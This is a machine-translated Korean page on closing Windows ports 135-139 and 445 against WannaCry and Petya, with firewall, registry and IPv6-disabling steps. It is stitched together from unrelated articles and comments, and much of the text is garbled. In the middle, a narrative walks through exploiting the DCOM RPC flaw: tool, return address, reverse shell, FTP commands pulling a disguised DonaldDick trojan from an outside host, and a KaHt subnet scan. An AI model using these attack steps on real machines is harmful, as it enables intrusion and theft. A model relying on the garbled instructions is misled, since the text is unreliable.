어제 알려지지 않은 사람들이 랜섬웨어 바이러스를 사용하여 또 다른 대규모 공격을 감행했습니다. 전문가들은 우크라이나와 러시아에 있는 수십 개의 대기업이 영향을 받았다고 말했습니다. 랜섬웨어의 이름은 Petya.A입니다(바이러스의 이름은 Petro Poroshenko의 이름을 따온 것 같습니다). 그들은 perfc 파일(확장자 없음)을 만들어 C:\Windows\에 저장하면 바이러스가 사용자를 우회할 것이라고 기록합니다. 컴퓨터가 재부팅되고 "디스크 검사"가 시작된 경우 즉시 컴퓨터를 꺼야 합니다. LiveCD 또는 USB에서 부팅하면 파일에 액세스할 수 있습니다. 자신을 보호하는 또 다른 방법은 포트 1024-1035, 135 및 445를 닫는 것입니다. 이제 Windows 10의 예를 사용하여 이 작업을 수행하는 방법을 이해할 것입니다.

1 단계
이동 윈도우 방화벽(향상된 보안 모드를 선택하는 것이 좋습니다) 탭을 선택하십시오 " 추가 옵션».
탭을 선택하십시오 " 들어오는 연결 규칙", 다음 조치 " 규칙 생성"(오른쪽 열).

2 단계
규칙 유형 선택 - " 포트용". 다음 창에서 " TCP 프로토콜", 닫으려는 포트를 지정하십시오. 우리의 경우 이 135, 445, 1024-1035 " (인용없이).

3단계
항목을 선택하십시오 " 연결 차단", 다음 창에서 모든 프로필을 표시합니다. 도메인, 비공개, 공개.

4단계
규칙의 이름을 찾아야 합니다(앞으로 쉽게 찾을 수 있도록). 규칙에 대한 설명을 지정할 수 있습니다.

일부 프로그램이 작동을 멈추거나 잘못 작동하기 시작하면 사용 중인 포트를 닫았을 수 있습니다. 방화벽에 예외를 추가해야 합니다.

135 TCP 포트원격 서비스(DHCP, DNS, WINS 등) 및 Microsoft 클라이언트-서버 응용 프로그램(예: Exchange)에서 사용됩니다.

445 TCP 포트에 사용 마이크로소프트 윈도우 NetBIOS를 사용하지 않고 직접 TCP/IP에 액세스하는 경우(예: Active Directory에서) 2000 이상.

출판

WannaCrypt 또는 Wanna Decryptor라고도 알려진 WannaCry 바이러스는 2017년 5월 가상 세계를 강타했습니다. 멀웨어로컬 네트워크에 침투하여 한 대의 컴퓨터를 차례로 감염시키고 디스크의 파일을 암호화하고 사용자에게 300~600달러를 갈취자들에게 송금하여 잠금을 해제할 것을 요구했습니다. 2017년 여름에 거의 정치적인 악명을 얻었던 Petya 바이러스도 비슷한 방식으로 행동했습니다.

두 네트워크 해충은 동일한 문을 통해 피해자 컴퓨터의 운영 체제에 침투했습니다. 네트워크 포트 445 또는 139. 두 개의 큰 바이러스에 이어 작은 유형의 컴퓨터 감염이 악용되기 시작했습니다. 게으르지 않은 모든 사람이 검사하는 이러한 포트는 무엇입니까?

Windows에서 포트 445 및 139는 무엇을 담당합니까?

이 포트는 다음 용도로 사용됩니다. 윈도우 시스템파일 및 프린터를 공유합니다. 첫 번째 포트는 SMB(서버 메시지 블록) 프로토콜을 담당하고 NetBIOS(네트워크 기본 입출력 시스템) 프로토콜은 두 번째 포트를 통해 작동합니다. 두 프로토콜 모두 아래의 컴퓨터를 허용합니다. 윈도우 컨트롤네트워크를 통해 기본 TCP 및 UDP 프로토콜을 통해 "공유" 폴더 및 프린터에 연결합니다.

Windows 2000부터 네트워크를 통한 파일 및 프린터 공유는 주로 SMB 응용 프로그램 프로토콜을 사용하는 포트 445를 통해 수행됩니다. NetBIOS 프로토콜은 포트 137, 138 및 139를 통해 작동하는 시스템의 이전 버전에서 사용되었으며 이 기능은 더 많은 버전에서 보존되었습니다. 이후 버전격변과 같은 시스템.

열린 항구가 위험한 이유

445 및 139는 Windows의 미묘하지만 중요한 취약점입니다. 이러한 포트를 보안되지 않은 상태로 두면 사용자의 문이 활짝 열립니다. HDD바이러스, 트로이 목마, 웜과 같은 초대받지 않은 손님뿐만 아니라 해커 공격. 컴퓨터가 켜져 있는 경우 지역 네트워크, 모든 사용자가 맬웨어에 감염될 위험이 있습니다.

사실상 이러한 포트에 액세스할 수 있는 모든 사람과 하드 드라이브를 공유하는 것입니다. 원하는 경우 공격자는 콘텐츠를 볼 수 있습니다. 하드 드라이브또는 데이터를 삭제하거나 디스크 자체를 포맷하거나 파일을 암호화할 수 있습니다. 그것이 바로 그들이 한 일입니다. 워너크라이 바이러스그리고 이번 여름에 전염병이 전 세계를 휩쓴 Petya.

따라서 데이터 보안에 관심이 있다면 Windows에서 포트 139 및 445를 닫는 방법을 배우는 것이 적절하지 않을 것입니다.

포트가 열려 있는지 확인

대부분의 경우 포트 445는 Windows에서 열려 있는 경우에도 프린터 및 파일 공유 기능이 자동으로 활성화됩니다. 윈도우 설치. 이것은 기계에서 쉽게 확인할 수 있습니다. 단축키 누르기 승+R창문을 열다 빠른 시작. 그 안에 입력 cmd"명령줄을 실행합니다. 명령줄에 " netstat-"를 누르고 입력하다. 이 명령을 사용하면 모든 활성 네트워크 포트를 검색하고 해당 상태 및 현재 들어오는 연결에 대한 데이터를 표시할 수 있습니다.

몇 초 후에 포트 통계 테이블이 나타납니다. 표의 맨 위에는 포트 445의 IP 주소가 표시되며 표의 마지막 열 상태가 다음과 같을 경우 "청취", 포트가 열려 있음을 의미합니다. 마찬가지로 테이블에서 포트 139를 찾아 상태를 확인할 수 있습니다.

Windows 10/8/7에서 포트를 닫는 방법

Windows 10, 7 또는 8에서 포트 445를 닫는 세 가지 주요 방법이 있습니다. 시스템 버전에 따라 크게 다르지 않고 매우 간단합니다. 당신은 그들 중 하나를 선택할 수 있습니다. 같은 방법으로 포트 139를 닫을 수도 있습니다.

방화벽을 통해 포트 닫기

Windows에서 포트 445를 닫을 수 있는 첫 번째 방법은 가장 간단하며 거의 모든 사용자가 사용할 수 있습니다.

  1. 이동 시작 > 제어판 > Windows 방화벽그리고 링크를 클릭 추가 옵션.
  2. 딸깍 하는 소리 인바운드 예외 규칙 > 새 규칙. 나타나는 창에서 다음을 선택하십시오. 포트 > 다음 > TCP 프로토콜 > 정의된 로컬 포트의 경우, 옆에 있는 필드에 445를 입력하고 더 나아가.
  3. 다음 선택 연결 차단그리고 다시 눌러 더 나아가. 세 개의 확인란을 다시 선택하십시오. 더 나아가. 새 규칙에 대한 이름과 설명(선택 사항)을 지정하고 준비가 된.

이제 포트 445로 들어오는 연결 가능성이 닫힙니다. 필요한 경우 포트 139에 대해 유사한 규칙을 만들 수 있습니다.

명령줄을 통해 포트 닫기

두 번째 방법은 명령줄 작업을 포함하며 고급 Windows 사용자에게 더 적합합니다.

  1. 딸깍 하는 소리 시작메뉴 하단의 검색창에 " cmd". 표시되는 목록에서 마우스 오른쪽 버튼으로 클릭마우스 온 cmd그리고 선택 관리자 권한으로 실행.
  2. 명령줄 창에 명령 복사 netsh advfirewall은 allprofile 상태를 설정합니다.딸깍 하는 소리 입력하다.
  3. 그런 다음 다음 명령을 복사합니다. netsh advfirewall 방화벽 추가 규칙 dir=in action=block protocol=TCP localport=445 name="Block_TCP-445".딸깍 하는 소리 입력하다다시.

이 절차는 또한 포트 445를 닫는 Windows 방화벽 규칙을 만듭니다. 그러나 일부 사용자는 다음과 같이 보고합니다. 이 방법해당 컴퓨터에서 작동하지 않음: 선택하면 포트가 "LISTENING" 상태로 유지됩니다. 이 경우에도 매우 간단한 세 번째 방법을 시도해야 합니다.

Windows 레지스트리를 통해 포트 닫기

변경하여 포트 445에 대한 연결을 차단할 수도 있습니다. 시스템 레지스트리. 이 방법은 주의해서 사용하십시오. 윈도우 레지스트리는 전체 시스템의 기본 데이터베이스이며 우발적인 실수로 인해 예측할 수 없는 결과가 발생할 수 있습니다. 레지스트리로 작업하기 전에 다음을 수행하는 것이 좋습니다. 지원예를 들어 CCleaner 프로그램을 사용합니다.

  1. 딸깍 하는 소리 시작그리고 검색창에 입력 "regedit". 딸깍 하는 소리 입력하다.
  2. 레지스트리 트리에서 다음 디렉터리로 변경합니다. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters.
  3. 창 오른쪽에 옵션 목록이 표시됩니다. 목록의 빈 영역을 마우스 오른쪽 버튼으로 클릭하고 만들다. 드롭다운 메뉴에서 DWORD 값(32비트)또는 DWORD 값(64비트)시스템 유형(32비트 또는 64비트)에 따라 다릅니다.
  4. 이름 바꾸기 새 매개변수안에 SMB장치활성화, 두 번 클릭합니다. 표시된 창에서 매개변수 변경현장에서 의미 1을 0으로 바꾸고 클릭 확인확인을 위해.

이 방법은 위의 지침을 정확히 따를 경우 가장 효과적입니다. 포트 445에만 적용됩니다.

보다 효과적인 보호를 위해 레지스트리를 변경한 후 다음을 비활성화할 수도 있습니다. 윈도우 서비스섬기는 사람. 이렇게 하려면 다음을 수행하십시오.

  1. 시작을 클릭하고 검색 창에 입력하십시오. "services.msc". Windows 시스템 서비스 목록이 열립니다.
  2. 서버 서비스를 찾아 더블 클릭합니다. 일반적으로 목록 중간 어딘가에 있습니다.
  3. 나타나는 창의 드롭다운 목록에서 실행 유형고르다 장애가 있는그리고 누르다 확인.

위의 방법(세 번째 방법 제외)을 사용하면 포트 445뿐만 아니라 포트 135, 137, 138, 139도 닫을 수 있습니다. 이렇게 하려면 절차를 수행할 때 포트 번호를 원하는 번호로 바꾸면 됩니다. 필요.

나중에 포트를 열어야 하는 경우 생성된 규칙을 삭제하기만 하면 됩니다. 윈도우 방화벽또는 레지스트리에서 생성된 매개변수의 값을 0에서 1로 변경한 다음 서비스를 다시 활성화합니다. 윈도우 서버목록에서 선택하여 실행 유형의미 자동으로대신에 장애가 있는.

중요한! Windows의 포트 445는 파일, 폴더 및 프린터 공유를 담당한다는 점을 기억해야 합니다. 따라서 닫으면 주어진 포트, 더 이상 "공유"할 수 없습니다. 공유 된 폴더다른 사용자를 위해 또는 네트워크를 통해 문서를 인쇄합니다.

컴퓨터가 로컬 네트워크에 연결되어 있고 이러한 기능이 작동해야 하는 경우 타사 보안 도구를 사용해야 합니다. 예를 들어 활성화 방화벽모든 포트를 제어하고 무단 액세스를 모니터링하는 바이러스 백신.

위의 권장 사항을 따르면 Windows의 미묘하지만 심각한 취약점으로부터 자신을 보호하고 포트 139 및 445를 통해 시스템에 들어갈 수 있는 다양한 유형의 맬웨어로부터 데이터를 보호할 수 있습니다.

취약점은 정말 끔찍했습니다.
기성품 익스플로잇은 사용할 수 없는 것으로 밝혀졌습니다.
사람들의 대부분은 ... 아마도 그 이유는
아무도 두려워하지 않았습니다 ...

해당 분야의 폴란드 전문가 그룹
보안 컴퓨터 기술"마지막
섬망의 무대 "발견에 대해 대중에게 알렸다.
취약점, DCOM 개체 처리
RPC 프로토콜의 컨텍스트 그것은 무언가였다
이 프로토콜 때문에 놀라운
거의 모든 사람이 사용
현재 존재하는 Windows 버전.
취약점은 Windows NT, Windows XP, Windows 2000으로 밝혀졌습니다.
심지어 Windows Server 2003도 표적이 되었습니다. 이것
인수하기에 충분했습니다.
대부분의 사용자 컴퓨터
인터넷 네트워크. 또한 많은 서버가
포트 135에서 들어오는 패킷 차단,
공격에 사용된 사람은 바로 그 사람이었습니다. 뭐
그들을 잠재적 희생자로 만들었습니다.

그러나 몇 시간 후 Todd Sabin은 다음과 같이 보고합니다.
모든 RPC 서비스가 취약합니다. 그것
방화벽을 설정하는 것을 의미합니다.
차단 포트 135로는 충분하지 않습니다.
보호 수단. 노출된 위험
개방형 135(UDP/TCP), 139, 445 및 593이 있는 컴퓨터
포트. 언론 보도 주어진 오류, 어떻게
잠재적인 보안 위험
Windows 사용자. 문제는 글로벌
재해. 하지만 대중들로부터
익스플로잇이 공개되지 않았으며 모두가 계속했습니다.
생각하지 않고 옛 삶을 살아라
대중에게 나타나는 결과.

그러나 모두가 그렇게 수동적으로 반응하는 것은 아닙니다.
이 취약점의 발생. 해커
점차 개인을 쓰기 시작
익스플로잇과 스크립트 아이들이 계속 기다렸습니다.
모습. 결과는 오래 걸리지 않았다
기다리다. 며칠 안에 그들은 나타납니다
이 분야의 일부 개발,
첫 번째 익스플로잇이 나타납니다. 그럼에도 불구하고
대부분은 충돌을 유발합니다.
원격 시스템에서. 설명할 수 있는 것
에 대한 기술적인 세부 사항부터
발견된 취약점은 알려지지 않았습니다. 하지만
일부 OS 버전은 이미 성공적으로
착취당했다.

이날은 역사의 전환점이었다.
이 취약점을 악용합니다. 드디어
나타난다 기술적 설명문제.
그 후 많은 수가 태어난다.
다른 버전의 Windows에 대한 익스플로잇.
그들 중 일부는 심지어 그래픽
인터페이스, 때로는 스캔 기능
특정 범위의 IP 주소.

이 순간 엄청난
일반 사용자에 대한 해커의 공격.
게다가 인터넷 웜 MS Blast가 등장하여,
컴퓨터에 쉽게 침투한
인터넷에 연결되어 있고 심지어
대기업의 기업 네트워크
평화. 다들 위험해...

원격 시스템을 공격하는 것은
특수 노동. 그래서 아이들이 대본을 맡았어
당신의 사업. 신용 카드 및 개인 도난
익스플로잇이 여러 번 증가했습니다. 그리고
네트워크의 많은 맛있는 세그먼트가
맛봐. 그게 그가 한 일이야
한 해커. 그는 오랫동안 서버를 인수하고 싶었고,
하지만 그 전에 그 아래에 괜찮은 취약성
하지 않았다. 이것을 이용하지 마십시오
그는 단순히 운명의 선물이 될 수 없습니다.

3막의 연극

그가 먼저 해야 할 일은
공격, 그것은 어느 것을 확인하는 것입니다
에 설치된 운영 체제
섬기는 사람. 이를 위해 그는 사용
nmap 유틸리티. 해커는 그녀에 대해 반복적으로 썼습니다.
가능성이 있지만 나는 스스로를 반복하고 말할 것입니다.
OS 버전을 결정하는 데 사용됩니다.
원격 컴퓨터. 그녀가 좋다
Windows 및 *nix 모두에 존재합니다. 하지만
그의 작업에 대한 해커로서
Windows를 사용한 후 그의 선택은
nmap의 그래픽 버전.

몇 분의 스캐너 작동 및
결과는 긍정적입니다. 135 포트로 밝혀졌습니다.
열려 있고 방화벽으로 보호되지 않습니다. 그것
끝의 시작이었고, 오랫동안 기다려온
공격. 이 시점에서 이미 작성되었습니다.
"RCP Exploit GUI #2"를 포함한 많은 익스플로잇.
그의 두드러진 특징은 그가
그래픽 인터페이스를 가지고 있고
자체 내장 스캔 기능
IP 범위 및 FTP 서버.

익스플로잇을 실행하면서 그는 주소를 표시했습니다.
대상 컴퓨터. 그러나 OS 목록에서
공격 윈도우 머신 NT가 지정되지 않았습니다. 하지만
서버에 설치되었습니다. 그것
심각한 문제 때문에
익스플로잇을 실행하려면 알아야 합니다.
메모리의 정확한 주소, 다음 전송
그를 통제하십시오. 조금 파고
익스플로잇과 함께 다운로드된 파일,
광범위한 주소 아래에 있는 작은 주소 목록을 찾았습니다.
다양성 윈도우 라인. 그 중
존재하고 Windows NT가 사전 설치되었습니다.
서비스 팩 4. 그가 말한 것은 그의 의미였습니다.
설명서에 침을 뱉어 반환 주소로
OS 선택. 숫자 0xE527F377은 그의 비밀이 되었다
서버의 수명을 전달합니다. 그리고 그는 공격을 시작했다.

시스템은 아무 것도 없이 포기했다
해커는 리버스 쉘을 얻었습니다.
와 함께 원격 서버. 이제 그는 할 수 있었다
그것에 대해 무엇이든 수행하십시오.
트로이 목마를 설치할 시간입니다. 큰 중에서
가능한 수, DonaldDick이 선택되었습니다. 을 위한
그는 그의 계획을 실행해야 했다
호스팅 받기 무료 서버와 함께
FTP 지원. BY.RU 완벽하게 딱 맞아
그곳에서 그는 트로이 목마용 서버를 업로드했습니다. 지금,
DonaldDick이 FTP를 통해 사용할 수 있게 되었을 때 그는
피해자를 차지하거나 오히려 업로드하기 시작했습니다.
트로이 목마 서버. 좋았어
취약점 때문에 잘 계획된 계획
패치되었을 수 있으며 트로이 목마도 아프리카에 있습니다.
트로이 사람. ftp 콘솔에 입력하여 그는 시작했습니다.
파일을 업로드합니다. 모든 과정이 그를 데려갔다
다섯 줄만 쓰기:

오픈 by.ru
server_name.by.ru
비밀번호
Fooware.exe 받기
안녕

여기서 fooware.exe는 이름이 변경된 서버입니다.
도널드 딕. 파일이 다운로드되면
그냥 실행하십시오. 이를 위해 그는 단순히
파일명(fooware.exe)을 쓰고 즐겼다
누름 Enter ... 그 후 해커는 편리한
서버에 대한 제어.

하지만 언제 어떻게 되는지 알잖아
계속해서 흥미로운 것을 찾으십시오
그것을 재생합니다. 그래서 우리 해커는
하나 이상의 시스템을 가져옵니다. 찾아본 후
익스플로잇은
스캔, 그는 일하기로 설정, 또는 오히려
KaHt가 작업을 인수했습니다. 그 용도
어렵지 않은 것으로 나타났습니다. 그래서 예를 들어,
IP 192.168.0.*(클래스 C)으로 네트워크를 스캔하는 방법에 대해
"KaHt.exe 129.168.0.1"을 입력해야 했습니다.
192.168.0.254". 실제로 그가 그랬습니다.
그런 다음 주기적으로 확인
결과. 따라서 그는 액세스 권한을 얻었습니다.
더 많은 사용자에게
그런 다음 그는 암호를 얻었습니다.
다양한 서비스, 메일 등
유용한 정보. 언급 할 필요없는,
그는 그들 중 많은 것을 다음과 같이 사용하기 시작했습니다.
익명 프록시.

생각할 거리

마이크로소프트는 오래전에 패치를 내놓았지만,
사용자와 관리자는 서두르지 않습니다
네트워크에서 패치를 설치하지 않기를 바랍니다.
아무도 관심이 없을 것입니다. 하지만 그런 해커들은
패치의 많은 수와 설치는
가능성보다 더 필요한 것.
들어오는 모든 패킷을 차단할 수도 있습니다.
135, 139, 445 및 593 포트에서.

당연히 해커는 이 모든 것을 통해
익명 프록시, 결과적으로 정리
시스템에 존재의 흔적 뒤에. 하지만 당신은
반복하기 전에 생각해야합니다
그의 착취. 결국, 그러한 행동은 고려됩니다
불법이며 다음과 같은 결과를 초래할 수 있습니다.
당신은 충분히 비참합니다 ...

, 방화벽이 svchost.exe가 이 포트를 수신 대기 중임을 표시한다고 해서 외부 연결을 위해 열려 있다는 의미는 아닙니다.

규칙은 작성된 것으로 보이며 작동해야 합니다.

포트 스캐너를 사용해 보셨습니까? - TsOB(보안 제공 센터)(2.7항)

IPv6은 여전히 ​​확인해야 한다는 사실을 잊지 마십시오. 시스템에서 활성화되어 있지만 스캐너는 일반적으로 IPv4만 확인합니다(중앙 집중식 서비스에 대해 말하는 것입니다).

이 프로토콜이 전혀 필요하지 않은 경우 비활성화할 수 있습니다.

에서 IP 버전 6 구성 요소를 비활성화하려면 윈도우 비스타, 아래 단계를 따르세요.

1. 시작 버튼을 클릭하고 검색 시작 상자에 regedit를 입력한 다음 프로그램 목록에서 regedit.exe를 선택합니다.

2. 사용자 계정 컨트롤 대화 상자에서 계속을 클릭합니다.

3. 다음 레지스트리 하위 키를 찾아 선택합니다.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\

4. DisabledComponents를 두 번 클릭하여 DisabledComponents 설정을 변경합니다.

메모. DisabledComponents 매개변수를 사용할 수 없는 경우 작성해야 합니다. 이렇게 하려면 아래 단계를 따르세요.

1. 편집 메뉴에서 새로 만들기를 선택한 다음 DWORD(32비트) 값을 선택합니다.

2. DisabledComponents를 입력하고 Enter 키를 누릅니다.

3. DisabledComponents를 두 번 클릭합니다.

5. 다음 값 중 하나를 입력하여 IP 버전 6을 구성한 후 확인을 클릭합니다.

1. 0을 입력하여 모든 IP 버전 6 구성 요소를 활성화합니다.

메모. 기본적으로 "0" 값이 사용됩니다.

2. 루프백 인터페이스를 제외한 모든 IP 버전 6 구성 요소를 비활성화하려면 0xffffffff를 입력합니다. 이 값을 사용하면 Windows Vista도 IPv6 대신 접두사 정책에서 IP 버전 4를 사용합니다.

3. 정책에서 IP 버전 6 대신 IP 버전 4 접두사를 사용하려면 0x20을 입력합니다.

4. 0x10을 입력하여 IP 버전 6 기본 인터페이스를 비활성화합니다.

5. 0x01을 입력하여 모든 IP 버전 6 터널 인터페이스를 비활성화합니다.

6. 루프백 인터페이스를 제외한 모든 IP 버전 6 인터페이스를 비활성화하려면 0x11을 입력합니다.

메모

* 0x0 또는 0x20 이외의 값을 사용하면 라우팅 및 원격 액세스 서비스가 실패할 수 있습니다.

* 변경 사항을 적용하려면 컴퓨터를 다시 시작해야 합니다.

이 문서의 정보는 다음 제품에 적용됩니다.

*윈도우 비스타 엔터프라이즈

*Windows Vista Enterprise 64비트 에디션

*Windows Vista Home Basic 64비트 에디션

*Windows Vista Home Premium 64비트 에디션

*Windows Vista Ultimate 64비트 에디션

*윈도우 비스타 비즈니스

*Windows Vista Business 64비트 에디션

*윈도우 비스타 홈 베이직

*윈도우 비스타 홈 프리미엄

*윈도우 비스타 스타터

*윈도우 비스타 얼티밋

*윈도우 7 엔터프라이즈

*윈도우 7 홈 베이직

*윈도우 7 홈 프리미엄

*윈도우 7 프로페셔널

*윈도우 7 얼티밋

*Windows Server 2008 R2 데이터 센터

* 윈도우 서버 2008 R2 엔터프라이즈

*Windows 서버 2008 R2 표준

*Windows Server 2008 데이터 센터

*윈도우 서버 2008 엔터프라이즈

*Windows 서버 2008 표준

출처 - http://support.microsoft.com/kb/929852

연결을 끊고 재부팅한 후 명령으로 받은 목록에서 IP 구성 / 모두많은 추가 줄이 사라지고 잘 알고 있는 인터페이스만 남게 됩니다.

역 포함은 레지스트리에서 생성된 키를 삭제하거나 값을 "0"으로 바꾼 다음 재부팅하면 됩니다.

매일 PC 소유자는 엄청난 양 위험한 프로그램어떤 식 으로든 하드 드라이브에 침투하여 중요한 데이터의 누출, 컴퓨터 고장, 도난을 유발하는 바이러스 중요한 정보및 기타 불쾌한 상황.

대부분의 경우 7, ​​8, 10 또는 기타 버전의 Windows에서 실행되는 컴퓨터가 감염됩니다. 주된 이유이러한 통계는 기본적으로 가용성으로 인해 시스템의 약점인 PC 또는 "포트"로 들어오는 연결입니다.

"항구"라는 단어는 다음을 의미하는 용어입니다. 일련 번호외부 소프트웨어에서 PC로 향하는 들어오는 연결. 이러한 포트는 IP 네트워크를 사용하여 컴퓨터에 쉽게 침투하는 바이러스를 사용하는 경우가 많습니다.

바이러스의 소프트웨어, 이러한 들어오는 연결을 통해 컴퓨터에 침투하면 사용자 파일뿐만 아니라 시스템 파일까지 모든 중요한 파일을 빠르게 감염시킵니다. 이를 방지하려면 해커의 공격을 받을 때 취약한 지점이 될 수 있는 모든 표준 포트를 닫는 것이 좋습니다.

Windows 7-10에서 가장 취약한 포트는 무엇입니까?

다수의 연구와 전문가 조사에 따르면 악의적인 공격 및 해킹의 최대 80%는 서로 간에 파일을 빠르게 교환하는 데 사용되는 4개의 주요 포트를 사용하여 발생했습니다. 다른 버전윈도우:

  • 에 필요한 TCP 포트 139 원격 연결및 PC 제어;
  • 명령을 실행하기 위한 TCP 포트 135;
  • 빠른 파일 전송을 위한 TCP 포트 445;
  • PC에서 빠른 검색이 수행되는 UDP 포트 137.

Windows에서 포트 135-139 및 445 닫기

우리는 당신을 가장 친숙하게 초대합니다 간단한 방법추가 지식과 전문 기술이 필요하지 않은 Windows 포트 폐쇄.

명령줄 사용

명령 Windows 문자열- 이것은 자체 그래픽 쉘이 없는 소프트웨어에 대한 특정 기능 및 매개변수를 설정하는 데 사용되는 소프트웨어 쉘입니다.

실행하려면 명령줄, 필요한:

  1. Win + R 키 조합을 동시에 누르십시오.
  2. 나타나는 명령줄에 cmd를 입력합니다.
  3. "확인"버튼을 클릭하십시오

나타날거야 작업 창검정색 배경으로 다음 명령을 하나씩 입력해야합니다. 각 줄을 입력한 후 Enter 키를 눌러 작업을 확인합니다.
netsh advfirewall 방화벽 추가 규칙 dir=in action=block protocol=tcp localport=135 name="Block1_TCP-135"(포트 135를 닫으라는 명령)
netsh advfirewall 방화벽 추가 규칙 dir=in action=block protocol=tcp localport=137 name="Block1_TCP-137"(포트 137을 닫으라는 명령)
netsh advfirewall 방화벽 추가 규칙 dir=in action=block protocol=tcp localport=138 name="Block1_TCP-138"(포트 138을 닫으라는 명령)
netsh advfirewall 방화벽 추가 규칙 dir=in action=block protocol=tcp localport=139 name="Block_TCP-139"(포트 139를 닫으라는 명령)
netsh advfirewall 방화벽 추가 규칙 dir=in action=block protocol=tcp localport=445 name="Block_TCP-445"(포트 445를 닫으라는 명령)
netsh advfirewall 방화벽 추가 규칙 dir=in action=block protocol=tcp localport=5000 name="Block_TCP-5000"

4개의 취약한 Windows TCP 포트 닫기(기본적으로 열려 있음), UDP 포트 138 닫기, 사용 가능한 서비스 목록 표시를 담당하는 포트 5000 닫기 등 6가지 명령이 필요합니다.

타사 프로그램으로 포트를 닫습니다.

명령줄 작업에 시간을 소비하고 싶지 않다면 다음을 숙지하는 것이 좋습니다. 타사 애플리케이션. 이러한 소프트웨어의 본질은 레지스트리를 편집하는 것입니다. 자동 모드와 함께 GUI, 명령을 수동으로 입력할 필요가 없습니다.

우리 사용자에 따르면, 가장 인기 프로그램이러한 목적을 위해 Windows Doors Cleaner가 있습니다. Windows 7/8/8.1/10을 실행하는 컴퓨터에서 포트를 쉽게 닫는 데 도움이 됩니다. 이전 버전 운영체제불행히도 지원되지 않습니다.

포트를 닫는 프로그램으로 작업하는 방법

Windows Doors Cleaner를 사용하려면 다음을 수행해야 합니다.

1. 소프트웨어 다운로드 및 설치
2. 바로 가기를 마우스 오른쪽 버튼으로 클릭하고 "관리자 권한으로 실행"을 선택하여 프로그램을 실행합니다.
3. 나타나는 작업 창에는 취약한 Windows 포트와 원하는 다른 포트를 닫는 포트 목록과 "닫기" 또는 "비활성화" 버튼이 있습니다.
4. 필요한 변경 사항을 적용한 후 시스템을 재부팅해야 합니다.

이 프로그램의 또 다른 장점은 포트를 닫을 수 있을 뿐만 아니라 열 수도 있다는 것입니다.

결론을 도출하다

Windows에서 취약한 네트워크 포트를 닫는 것이 모든 질병의 만병통치약은 아닙니다. 네트워크 보안은 PC의 모든 취약점을 차단하기 위한 포괄적인 조치를 통해서만 달성할 수 있다는 점을 기억하는 것이 중요합니다.

안전을 위해 윈도우 사용자 Microsoft에서 제공하는 중요 업데이트를 설치하고, 안티바이러스 소프트웨어를 라이센스하고 방화벽을 활성화하고, 안전한 소프트웨어만 사용하고, 우리가 모든 것에 대해 이야기하는 기사를 정기적으로 읽어야 합니다. 기존 방법데이터의 익명성과 보안을 달성하십시오.

네트워크 포트를 닫는 더 좋은 방법을 알고 있습니까? 의견에 지식을 공유하고 귀하의 페이지에 기사를 다시 게시하는 것을 잊지 마십시오. 공유하다 유용한 정보친구와 함께하고 해커가 사랑하는 사람을 해칠 기회를 주지 마십시오!